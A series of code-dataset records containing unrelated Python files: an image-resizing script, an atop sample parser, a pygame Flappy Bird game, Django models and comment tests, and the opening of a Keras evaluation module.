-*-\n'''\n你有一个目录,装了很多照片,把它们的尺寸变成都不大于 iPhone5 分辨率的大小。\niPhone5 分辨率为(1136,640)\n'''\nfrom PIL import Image\nimport glob\n\n#得到指定目录下所有图片的列表\ndef get_imagelist():\n return glob.glob(r'C:\\Users\\Administrator\\Pictures\\*.jpg')\n\n#图片处理\ndef image_process(image,num,size=(1136,640)):\n img=Image.open(image)\n sizex,sizey=img.size\n if sizex > size[0]:\n sizex=size[0]\n if sizey > size[1]:\n xizey=size[1]\n img=img.resize((sizex,sizey))\n num=str(num)\n img.save(num+'.jpg','jpeg')\n\n#主函数\ndef main():\n image_list=get_imagelist()\n n=1\n for image in image_list:\n image_process(image,n)\n n+=1\n\nif __name__=='__main__':\n main()\n","sub_path":"0005/0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"132013605","text":"\"\"\"\n Representation of an atop sample.\n\"\"\"\nimport logging\nimport json\n\nfrom memline import MemLine\nfrom cpuline import CpuLine\nfrom iso8601timestamp import Iso8601Timestamp\n\nclass AtopSample(object):\n \"\"\"\n An atop sample taken on a host at a particular time.\n \"\"\"\n\n def __init__(self, sample_no, logger=None):\n self._logger = logger or logging.getLogger(__name__)\n self.sample_no = sample_no\n self.hostname = None\n self.timestamp = None\n self.lines = []\n\n def parse_line(self, line):\n if line.startswith(\"MEM\"):\n self.lines.append(MemLine(line))\n elif line.startswith(\"CPU\"):\n self.lines.append(CpuLine(line))\n\n def to_json(self):\n if self.timestamp == None:\n self._finalise_sample()\n fields = {}\n fields[\"@version\"] = 1\n fields[\"@timestamp\"] = Iso8601Timestamp(self.timestamp).to_iso8601()\n fields[\"host\"] = self.hostname\n for line in self.lines:\n line.addFields(fields)\n\n self._logger.debug(\"Atop sample \" + str(self.sample_no) +\n \": host=\" + fields[\"host\"] + \", timestamp=\" + fields[\"@timestamp\"])\n\n return json.dumps(fields, sort_keys=True)\n\n def _finalise_sample(self):\n assert len(self.lines) > 0\n first_line = self.lines[0]\n if self.hostname == None:\n self.hostname = first_line.get_host_name()\n if self.timestamp == None:\n self.timestamp = first_line.get_timestamp()\n\n","sub_path":"atopsample.py","file_name":"atopsample.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"232611769","text":"import pygame\nimport os\nimport sys\nimport random\nimport pickle\n\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\nWHITE = (255, 255, 255)\nGREEN = (51, 255, 51)\nRED = (205, 32, 32)\nBLACK = (0,0,0)\n\n\ndef load_image(name):\n \"\"\"\n Upload an image from file and convert it to the surface.\n :param name: name of the image file\n :return: converted image\n \"\"\"\n fullname = os.path.join(\"images\", name)\n image = pygame.image.load(fullname)\n image = image.convert_alpha()\n return image\n\ndef load_sound(name):\n \"\"\"\n Upload a sound from file.\n :param name: name of the sound file\n :return: sound\n \"\"\"\n fullname = os.path.join(\"sounds\", name)\n sound = pygame.mixer.Sound(fullname)\n return sound\n\nclass Bird(pygame.sprite.Sprite):\n \"\"\"\n Class representing a bird.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize three birds and their rects.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.red_mid = load_image(\"redbird_mid.png\")\n self.red_rect = self.red_mid.get_rect(center=(50, 270))\n self.yellow_mid = load_image('yellowbird_mid.png')\n self.yellow_rect = self.yellow_mid.get_rect(center=(50,260))\n self.blue_mid = load_image('bluebird_mid.png')\n self.blue_rect = self.blue_mid.get_rect(center=(50,260))\n\n\nclass Floor(pygame.sprite.Sprite):\n \"\"\"\n Class representing the floor.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize the floor and its position.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.floor = pygame.transform.scale(load_image(\"base.png\"), (400, 130))\n self.position = 0\n\n def move(self):\n \"\"\"\n Repeatedly move the floor to the left.\n \"\"\"\n screen.blit(self.floor, (self.position, 500))\n screen.blit(self.floor, (self.position + 400, 500))\n\n\nclass Pipe(pygame.sprite.Sprite):\n \"\"\"\n Class representing the pipes.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize top and bottom pipe.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.green_bottom = pygame.transform.scale(load_image(\"green_bottom.png\"), (60, 350))\n self.green_top = pygame.transform.scale(load_image('green_top.png'), (60, 350))\n self.list_bottom = []\n self.list_top = []\n\n def create_bottom(self):\n \"\"\"\n Create a bottom pipe rectangle.\n :return: bottom pipe rectangle\n \"\"\"\n self.random_height = random.randrange(150, 440)\n self.bottom = self.green_bottom.get_rect(midtop=(430, self.random_height))\n return self.bottom\n\n def create_top(self):\n \"\"\"\n Create a top pipe rectangle.\n :return: top pipe rectangle\n \"\"\"\n self.top = self.green_bottom.get_rect(midbottom=(427, self.bottom.centery - 260))\n return self.top\n\n def move(self, option: float):\n \"\"\"\n Move top and bottom pipes repeatedly to the left.\n :param option: distance by which the pipes move\n :return: moving pipes\n \"\"\"\n for i in self.list_bottom:\n i.centerx -= option\n screen.blit(self.green_bottom, i)\n for i in self.list_top:\n i.centerx -= option\n screen.blit(self.green_top, i)\n\n def collision(self, bird_col):\n \"\"\"\n Check if bird collide with the pipes.\n :param bird_col: chosen bird rectangle\n :return: True if collided\n \"\"\"\n for i in self.list_bottom:\n for j in self.list_top:\n if i.colliderect(bird_col) or j.colliderect(bird_col):\n return True\n\ndef show_score(score, high_score, status):\n \"\"\"\n Display the score on the screen.\n :param score: gained score to display\n :param high_score: high_score to display\n :param option: state of the game('game_over', 'game_in' or 'high_score' when displaying the high score)\n :return: display wanted score\n \"\"\"\n font = pygame.font.Font('font.TTF', 40)\n if status == 'game_over':\n result = font.render(f\"SCORE: {int(score)}\", True, (255, 255, 255))\n screen.blit(result, (120,40))\n elif status == 'game_in':\n result = font.render(f\"{int(score)}\", True, (255, 255, 255))\n screen.blit(result, (185,40))\n elif status == 'high_score':\n result = font.render(f\"HIGH SCORE: {int(high_score)}\", True, (255,255,255))\n screen.blit(result, (70,180))\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\npygame.display.set_caption(\"Flappy Bird\")\nfps = pygame.time.Clock()\nbackground_day = load_image(\"background_day.png\")\nbackground_day = pygame.transform.scale(background_day, (400, 600))\nbackground_night = load_image(\"background_night.png\")\nbackground_night = pygame.transform.scale(background_night, (400,600))\nstart_image = load_image(\"start.png\")\nstart_image = pygame.transform.scale(start_image, (200,300))\nstart_image_rect = start_image.get_rect(center=(200,270))\ngame_over_im = load_image(\"gameover.png\")\nclick_to_play = load_image(\"startclick.png\")\ndie_sound = load_sound('die.wav')\nhit_sound = load_sound('hit.wav')\npoint_sound = load_sound('point.wav')\nflap_sound = load_sound('flap.wav')\nflappy_im = pygame.transform.scale(load_image('flappy.png'), (200,100))\ngold_medal = pygame.transform.scale(load_image('gold.png'), (40,40))\nsilver_medal = pygame.transform.scale(load_image('silver.png'), (40,40))\nbronze_medal = pygame.transform.scale(load_image('bronze.png'), (40,40))\n\npipe = Pipe()\nbird = Bird()\nfloor = Floor()\n\ndef rules():\n \"\"\"\n Show rules of the game\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 20)\n font3 = pygame.font.SysFont('Consolas', 20)\n rul = True\n while rul:\n screen.blit(background_day, (0,0))\n screen.blit(flappy_im, (100,40))\n headline = font1.render(\"Game Rules\", True, WHITE)\n screen.blit(headline, (60,120))\n screen.blit(font2.render(\"This game is about flying a bird between pipes.\", True, BLACK),(20,195))\n screen.blit(font2.render(\"The bird is automatically flying down and you\", True, BLACK),(20,215))\n screen.blit(font2.render(\"can start its fly up by pressing a SPACE button \", True, BLACK), (20,235))\n screen.blit(font2.render(\"or click a mouse. When the bird collide with the\", True, BLACK),(20,255))\n screen.blit(font2.render(\"pipes or with the ground the game is over and\", True, BLACK),(20,275))\n screen.blit(font2.render(\"you have to start from the beginning. After \", True, BLACK),(20,295))\n screen.blit(font2.render(\"avoiding the pipe you will get one point.\", True, BLACK),(20,315))\n screen.blit(font2.render(\"So let's try it yourself and have fun!\", True, BLACK), (20, 335))\n screen.blit(font3.render(\"Press SPACE to go back.\", True, RED),(70,475))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n rul = False\n menu()\n\ndef author_info():\n \"\"\"\n Show info about author of this game\"\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 25)\n font3 = pygame.font.SysFont('Consolas', 20)\n info = True\n while info:\n screen.blit(background_day, (0,0))\n screen.blit(flappy_im, (95, 40))\n headline = font1.render(\"Author\", True, WHITE)\n screen.blit(headline, (110, 120))\n screen.blit(font2.render(\"Hi! I am Julia and this is a Flappy Bird\", True, BLACK),(20, 190))\n screen.blit(font2.render(\"game - the most annoying game in the\", True, BLACK), (20, 220))\n screen.blit(font2.render(\"world! But to be honest one of my\", True, BLACK),(20,250))\n screen.blit(font2.render(\"favourite and that's why I've decided to \", True, BLACK), (20,280))\n screen.blit(font2.render(\"make it :). I hope you will enjoy it too!\", True, BLACK), (20,310))\n line6 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line6, (70, 490))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n info = False\n menu()\n\ndef choose_options():\n \"\"\"\n Show screen with possible game options which player can choose and start the game after choosing.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 20)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.SysFont('arial', 25)\n options = True\n while options:\n screen.blit(background_day, (0, 0))\n screen.blit(load_image('redbird_mid.png'), (30, 260))\n screen.blit(load_image('yellowbird_mid.png'), (30, 300))\n screen.blit(load_image('bluebird_mid.png'), (30, 340))\n screen.blit(load_image('redbird_mid.png'), (230, 260))\n screen.blit(load_image('yellowbird_mid.png'), (230, 300))\n screen.blit(load_image('bluebird_mid.png'), (230, 340))\n screen.blit(font2.render(\"Press 1\", True, WHITE), (80, 260))\n screen.blit(font2.render(\"Press 2\", True, WHITE), (80, 300))\n screen.blit(font2.render(\"Press 3\", True, WHITE), (80,340))\n screen.blit(font2.render(\"Press 4\", True, WHITE), (280,260))\n screen.blit(font2.render(\"Press 5\", True, WHITE), (280,300))\n screen.blit(font2.render(\"Press 6\", True, WHITE), (280,340))\n screen.blit(font4.render(\"Choose mode and bird color to start:\", True, WHITE), (30,175))\n screen.blit(font4.render(\"EASY\", True, WHITE), (70,215))\n screen.blit(font4.render(\"HARD\", True, WHITE), (270,215))\n screen.blit(flappy_im, (100, 40))\n headline = font1.render(\"Options\", True, WHITE)\n screen.blit(headline, (100, 120))\n line5 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line5, (70, 490))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n menu()\n if event.key == pygame.K_1:\n flap('easy', 'red')\n if event.key == pygame.K_2:\n flap('easy', 'yellow')\n if event.key == pygame.K_3:\n flap('easy', 'blue')\n if event.key == pygame.K_4:\n flap('hard', 'red')\n if event.key == pygame.K_5:\n flap('hard', 'yellow')\n if event.key == pygame.K_6:\n flap('hard', 'blue')\n pygame.display.update()\n fps.tick(100)\n\ndef show_options():\n \"\"\"\n Only show possible options of the game.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 25)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.SysFont('arial', 20)\n show = True\n while show:\n screen.blit(background_day, (0, 0))\n screen.blit(flappy_im, (95, 40))\n screen.blit(load_image('redbird_mid.png'), (120, 300))\n screen.blit(load_image('yellowbird_mid.png'), (180, 300))\n screen.blit(load_image('bluebird_mid.png'), (240, 300))\n screen.blit(font2.render(\"In this game you have two possible\", True, BLACK), (30, 175))\n screen.blit(font2.render(\"difficulty levels: EASY and HARD\", True, BLACK), (30,210))\n screen.blit(font2.render('and three bird colors to choose:', True, BLACK), (30,245))\n screen.blit(font4.render('You will be able to choose them ', True, BLACK), (70, 380))\n screen.blit(font4.render('after clicking start button.', True, BLACK), (94,400))\n headline = font1.render(\"Options\", True, WHITE)\n screen.blit(headline, (100, 120))\n line5 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line5, (70, 490))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n menu()\n pygame.display.update()\n fps.tick(100)\n\n\ndef show_records():\n \"\"\"\n Show the screen with three high scores in easy and hard mode.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 30)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.Font('font.TTF', 40)\n screen.blit(background_day, (0, 0))\n with open('high_score4.dat', 'rb') as file:\n score1 = pickle.load(file)\n with open('high_score3.dat', 'rb') as file:\n score2 = pickle.load(file)\n with open('high_score2.dat', 'rb') as file:\n score3 = pickle.load(file)\n with open('high_score7.dat', 'rb') as file:\n score4 = pickle.load(file)\n with open('high_score6.dat', 'rb') as file:\n score5 = pickle.load(file)\n with open('high_score5.dat', 'rb') as file:\n score6 = pickle.load(file)\n show = True\n while show:\n screen.blit(gold_medal, (15,205))\n screen.blit(silver_medal, (12,260))\n screen.blit(bronze_medal, (13,315))\n screen.blit(gold_medal, (215, 205))\n screen.blit(silver_medal, (212, 260))\n screen.blit(bronze_medal, (213, 315))\n screen.blit(flappy_im, (100, 40))\n headline = font1.render(\"High Scores\", True, WHITE)\n screen.blit(headline, (50, 100))\n screen.blit(font2.render(\"EASY\", True, WHITE), (50,160))\n screen.blit(font2.render(\"HARD\", True, WHITE), (250,160))\n screen.blit(font4.render(str(score1), True, WHITE), (70,205))\n screen.blit(font4.render(str(score2), True, WHITE), (70, 260))\n screen.blit(font4.render(str(score3), True, WHITE), (70, 315))\n screen.blit(font4.render(str(score4), True, WHITE), (270, 205))\n screen.blit(font4.render(str(score5), True, WHITE), (270, 260))\n screen.blit(font4.render(str(score6), True, WHITE), (270, 315))\n line6 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line6, (70, 490))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n show = False\n menu()\n\ndef update_easy_high_scores(score):\n \"\"\"\n Update the high score of game easy mode and write it to the appropriate file.\n :param score: gained score\n \"\"\"\n with open('high_score4.dat', 'rb') as f4:\n last_high = pickle.load(f4)\n if score >= last_high:\n with open('high_score4.dat', 'wb') as f4:\n pickle.dump(score, f4)\n else:\n with open('high_score3.dat', 'rb') as f3:\n last_high = pickle.load(f3)\n if score >= last_high:\n with open('high_score3.dat', 'wb') as f3:\n pickle.dump(score, f3)\n else:\n with open('high_score2.dat', 'rb') as f2:\n last_high = pickle.load(f2)\n if score > last_high:\n with open('high_score2.dat', 'wb') as f2:\n pickle.dump(score, f2)\n\ndef update_hard_high_scores(score):\n \"\"\"\n Update the high score of game hard mode and write it to the appropriate file.\n :param score: gained score\n \"\"\"\n with open('high_score7.dat', 'rb') as f7:\n last_high = pickle.load(f7)\n if score >= last_high:\n with open('high_score7.dat', 'wb') as f7:\n pickle.dump(score, f7)\n else:\n with open('high_score6.dat', 'rb') as f6:\n last_high = pickle.load(f6)\n if score >= last_high:\n with open('high_score6.dat', 'wb') as f6:\n pickle.dump(score, f6)\n else:\n with open('high_score5.dat', 'rb') as f5:\n last_high = pickle.load(f5)\n if score > last_high:\n with open('high_score5.dat', 'wb') as f5:\n pickle.dump(score, f5)\n\ndef menu():\n \"\"\"\n Show screen with the main menu.\n \"\"\"\n font = pygame.font.Font('font.TTF', 30)\n font2 = pygame.font.SysFont('Consolas', 20)\n text = font2.render(\"Use arrow keys to navigate.\", True, RED)\n text1 = font2.render(\"Press SPACE to choose.\", True, RED)\n\n screen.blit(background_day, (0, 0))\n screen.blit(floor.floor, (0, 500))\n screen.blit(start_image, (100, 20))\n\n pygame.draw.rect(screen, RED, pygame.Rect(60, 340, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 340, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(60, 395, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 395, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(60, 450, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 450, 130, 40))\n\n m = True\n selected = 'Start'\n\n while m:\n screen.blit(text, (60,530))\n screen.blit(text1, (80, 560))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if selected == \"Start\":\n if event.key == pygame.K_DOWN:\n selected = \"Options\"\n if event.key == pygame.K_RIGHT:\n selected = \"Rules\"\n elif selected == \"Rules\":\n if event.key == pygame.K_LEFT:\n selected = \"Start\"\n if event.key == pygame.K_DOWN:\n selected = \"Records\"\n elif selected == \"Options\":\n if event.key == pygame.K_UP:\n selected = \"Start\"\n if event.key == pygame.K_DOWN:\n selected = \"Author\"\n if event.key == pygame.K_RIGHT:\n selected = \"Records\"\n elif selected == \"Records\":\n if event.key == pygame.K_UP:\n selected = \"Rules\"\n if event.key == pygame.K_DOWN:\n selected = \"Exit\"\n if event.key == pygame.K_LEFT:\n selected = \"Options\"\n elif selected == \"Author\":\n if event.key == pygame.K_UP:\n selected = \"Options\"\n if event.key == pygame.K_RIGHT:\n selected = \"Exit\"\n elif selected == \"Exit\":\n if event.key == pygame.K_UP:\n selected = \"Records\"\n if event.key == pygame.K_LEFT:\n selected = \"Author\"\n if event.key == pygame.K_SPACE:\n if selected == \"Start\":\n choose_options()\n if selected == \"Exit\":\n pygame.quit()\n sys.exit()\n if selected == \"Rules\":\n rules()\n if selected == \"Options\":\n show_options()\n if selected == \"Records\":\n show_records()\n if selected == \"Author\":\n author_info()\n if selected == \"Start\":\n start_text = font.render(f\"Start\", True, GREEN)\n else:\n start_text = font.render(f\"Start\", True, WHITE)\n if selected == \"Exit\":\n exit_text = font.render(f\"Exit\", True, GREEN)\n else:\n exit_text = font.render(f\"Exit\", True, WHITE)\n if selected == \"Rules\":\n rules_text = font.render(f\"Rules\", True, GREEN)\n else:\n rules_text = font.render(f\"Rules\", True, WHITE)\n if selected == \"Author\":\n author_text = font.render(f\"Author\", True, GREEN)\n else:\n author_text = font.render(f\"Author\", True, WHITE)\n if selected == \"Records\":\n scores_text = font.render(f\"Records\", True, GREEN)\n else:\n scores_text = font.render(f\"Records\", True, WHITE)\n if selected == \"Options\":\n options_text = font.render(f\"Options\", True, GREEN)\n else:\n options_text = font.render(f\"Options\", True, WHITE)\n\n screen.blit(start_text, (80, 345))\n screen.blit(rules_text, (235, 345))\n screen.blit(options_text, (70, 400))\n screen.blit(scores_text, (215, 400))\n screen.blit(author_text, (75, 455))\n screen.blit(exit_text, (245, 455))\n pygame.display.update()\n fps.tick(100)\n\ndef flap(mode, color):\n \"\"\"\n Main game - Flappy Bird.\n :param mode: 'easy' or 'hard'\n :param color: color of the bird (red, yellow or blue)\n \"\"\"\n if mode == 'easy':\n SHOWPIPE = pygame.USEREVENT\n pygame.time.set_timer(SHOWPIPE, 2300)\n elif mode == 'hard':\n SHOWPIPE = pygame.USEREVENT\n pygame.time.set_timer(SHOWPIPE, 1000)\n\n bird_mov = 0\n game = True\n score = 0\n sound = True\n\n while True:\n if mode == 'easy':\n screen.blit(background_day, (0, 0))\n elif mode == 'hard':\n screen.blit(background_night, (0,0))\n if color == 'red':\n screen.blit(bird.red_mid, bird.red_rect)\n bird_col = bird.red_rect\n elif color == 'yellow':\n screen.blit(bird.yellow_mid, bird.yellow_rect)\n bird_col = bird.yellow_rect\n elif color == 'blue':\n screen.blit(bird.blue_mid, bird.blue_rect)\n bird_col = bird.blue_rect\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if (event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE) or event.type == pygame.MOUSEBUTTONDOWN:\n if not game:\n score = 0\n flap_sound.play()\n game = True\n sound = True\n bird_mov = 0\n bird_mov += -2.3\n if event.type == SHOWPIPE:\n pipe.list_bottom.append(pipe.create_bottom())\n pipe.list_top.append(pipe.create_top())\n if event.type == pygame.KEYDOWN:\n if not game:\n if event.key == pygame.K_RETURN:\n score = 0\n bird_col.center = (50, 270)\n pipe.list_top.clear()\n pipe.list_bottom.clear()\n menu()\n\n bird_mov += 0.1\n bird_col.centery += bird_mov\n\n if game:\n if bird_col.centery <= 12:\n bird_col.centery = 12\n if mode == 'hard':\n floor.position += -2\n pipe.move(2)\n if mode == 'easy':\n floor.position += -1\n pipe.move(1)\n floor.move()\n if floor.position <= -400:\n floor.position = 0\n for i in pipe.list_top:\n if i.centerx == bird_col.centerx - 47:\n score += 1\n point_sound.play()\n show_score(score, 0,'game_in')\n else:\n screen.blit(floor.floor, (0, 500))\n screen.blit(game_over_im, (100, 100))\n screen.blit(click_to_play, (110, 250))\n font3 = pygame.font.SysFont('Consolas', 20)\n screen.blit(font3.render(\"Press ENTER to go to menu.\", True, RED), (60,535))\n screen.blit(font3.render(\"Press SPACE to play\", True, RED), (90,565))\n pipe.list_top.clear()\n pipe.list_bottom.clear()\n show_score(score, 0,'game_over')\n if mode == 'easy':\n update_easy_high_scores(score)\n show_score(score, pickle.load(open('high_score4.dat', 'rb')), 'high_score')\n elif mode == 'hard':\n update_hard_high_scores(score)\n show_score(score, pickle.load(open('high_score7.dat', 'rb')), 'high_score')\n\n if pipe.collision(bird_col):\n game = False\n die_sound.play()\n elif bird_col.centery >= 490:\n bird_col.centery = 490\n game = False\n if sound:\n hit_sound.play()\n sound = False\n\n pygame.display.update()\n fps.tick(100)\n\n\nif __name__ == '__main__':\n menu()\n","sub_path":"FlappyBird.py","file_name":"FlappyBird.py","file_ext":"py","file_size_in_byte":25255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"384602686","text":"\nfrom django.db import models\nimport datetime\nfrom django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User, UserManager\n\nclass News(models.Model):\n title = models.CharField(max_length=200)\n content = models.TextField()\n content_html = models.TextField()\n header = models.TextField()\n published = models.BooleanField(default=False)\n date_added = models.DateTimeField()\n sources = models.TextField()\n html_update_time = models.DateTimeField()\n from_ip = models.IntegerField()\n spam = models.BooleanField(default=False)\n img_cover_url= models.CharField(max_length=250)\n\n class Meta:\n db_table = 'news'\n app_label = 'xdev'\n verbose_name_plural = \"News\"\n\n def __str__(self):\n return self.title\n\n def __unicode__(self):\n return self.title\n\nclass SpamTitle(models.Model):\n title = models.CharField(max_length=200)\n\n class Meta:\n db_table = 'spamTitles'\n app_label = 'news'\n\nclass URL(models.Model):\n url = models.CharField(max_length=260)\n image = models.ForeignKey('Image', null=True, blank=True)\n\n class Meta:\n db_table = 'url'\n app_label = 'xdev'\n\nclass Image(models.Model):\n w = models.IntegerField()\n h = models.IntegerField()\n md5 = models.CharField(max_length=32)\n ext = models.CharField(max_length=4)\n\n class Meta:\n db_table = 'images'\n app_label = 'xdev'\n\n\n\n\n\n\n\n\n\n\nfrom django.contrib import admin\nfrom django.db import models\nimport datetime\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User, UserManager\nfrom django.contrib.auth.models import (\n BaseUserManager, AbstractBaseUser\n)\n\nclass MyUserManager(BaseUserManager):\n def create_user(self, email, password=None):\n \"\"\"\n Creates and saves a User with the given email, date of\n birth and password.\n \"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n #date_of_birth=date_of_birth,\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, email, password):\n \"\"\"\n Creates and saves a superuser with the given email, date of\n birth and password.\n \"\"\"\n user = self.create_user(email,\n password=password,\n #date_of_birth=date_of_birth\n )\n user.is_admin = False\n user.save(using=self._db)\n return user\n\nclass CustomUser(AbstractBaseUser):\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n db_index=True,\n )\n username = models.CharField(max_length=200)\n is_superuser = models.BooleanField(default=False)\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=datetime.datetime.utcnow)\n first_name = models.CharField(max_length=200)\n last_name = models.CharField(max_length=200)\n\n date_last_pass_sent = models.DateTimeField()\n\n # Use UserManager to get the create_user method, etc.\n objects = MyUserManager()\n USERNAME_FIELD = 'email'\n\n @property\n def devtools_available(self):\n return self.is_superuser\n\n class Meta:\n db_table = 'auth_user'\n app_label = settings.MODULE\n\n def get_full_name(self):\n # The user is identified by their email address\n return self.email\n\n def get_short_name(self):\n # The user is identified by their email address\n return self.email\n\n def has_perm(self, perm, obj=None):\n \"Does the user have a specific permission?\"\n if self.is_superuser: return True\n\n # News\n if perm==\"news.add\": return True\n elif perm==\"news.edit\": return False\n elif perm==\"news.delete\": return False\n\n # Articles\n #elif perm==\"article.edit\": return False\n elif perm==\"article.add_revision\": return False\n elif perm==\"article.accept_revision\": return False # But it's verified later\n\n # Site actions\n elif perm==\"format.preview\": return self.is_authenticated()\n elif perm==\"site.clear_cache\": return self.is_superuser\n\n return False\n\n def has_module_perms(self, app_label):\n \"Does the user have permissions to view the app `app_label`?\"\n # Simplest possible answer: Yes, always\n return self.is_superuser\n\n def __unicode__(self):\n if self.first_name:\n return self.first_name\n else:\n return self.email\n #return \"{}\".format(self.first_name)\n\n#def create_custom_user(sender, instance, created, **kwargs):\n# if created:\n# values = {}\n# for field in sender._meta.local_fields:\n# values[field.attname] = getattr(instance, field.attname)\n# user = CustomUser(**values)\n# user.save()\n#\n#post_save.connect(create_custom_user, User)\n#admin.site.register(CustomUser, MyUserAdmin)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"617439591","text":"from django.test import TestCase\nfrom users.models import Picture, Profile, Comment\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nimport time, re\n\nclass TestPostComment(TestCase):\n\n def setUp(self): \n #create the user who will post the picture\n self.pictureUser = User.objects.create_user('bob')\n self.pictureUser.save()\n\n #create users who will comment on the picture\n self.comment1User = User.objects.create_user('joe')\n self.comment1User.save()\n self.comment2User = User.objects.create_user('billy')\n self.comment2User.save()\n self.comment3User = User.objects.create_user('mary')\n self.comment3User.save()\n\n #Create reference to pic we want to upload\n self.pic = 'media/italy-landscape.png'\n\n #create reference times\n self.pictureUploadTime = timezone.now()\n time.sleep(0.5)\n self.commentTime = timezone.now()\n\n #Create the picture to be posted\n self.validPicture = Picture.objects.create(\n owner=self.pictureUser,\n picture_object=self.pic,\n post_date=self.pictureUploadTime\n )\n\n #create the text to be added to the comment\n self.commentText = \"Wow bob, thats so funny. AhaHA! Love Joe <3\"\n\n #create the first comment\n self.comment1 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment1User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #create a second comment\n self.comment2 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment2User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #create a third comment\n self.comment3 = Comment.objects.create(\n picture = self.validPicture,\n author = self.comment3User,\n text = self.commentText,\n created_date = self.commentTime,\n approved_comment = True\n )\n\n #test if the comment text matches and it was uploaded at the correct time\n def test_post_comment(self):\n self.assertEquals(self.comment1.text, self.commentText)\n self.assertEquals(self.comment1.created_date, self.commentTime)\n self.assertNotEquals(self.comment1.text, \"\")\n self.assertNotEquals(self.comment1.text, None)\n\n #test if all three comments exist\n def test_comment_count(self):\n comments = Comment.objects.filter(picture = self.validPicture)\n self.assertEquals(len(comments), 3)\n\n #now we check to see if the comment is actually in the picture\n def test_check_comment_on_photo(self):\n\n #get the comments on the picture\n comments = Comment.objects.filter(picture = self.validPicture)\n\n #now for each comment in the list of comments, we extract the comment itself\n #and assert if it does not match the correct commentText\n for unfilteredComment in comments:\n #we can split on the '-' since we know they wont be present\n #in the comments made for the test\n filteredComment = unfilteredComment.text.split('-')\n self.assertEquals(filteredComment[0], self.commentText)\n\n\n\n","sub_path":"SlightlyDelayedGram/tests/tests_Comments.py","file_name":"tests_Comments.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244633345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 22 14:49:19 2020\r\n\r\n@author: huuui\r\n\"\"\"\r\nfrom dataread import Read_data\r\nfrom keras.preprocessing import sequence\r\nimport keras.backend as K\r\nimport numpy as np\r\nimport copy \r\n\r\nclass evaluate:\r\n def __init__(self, aspect, 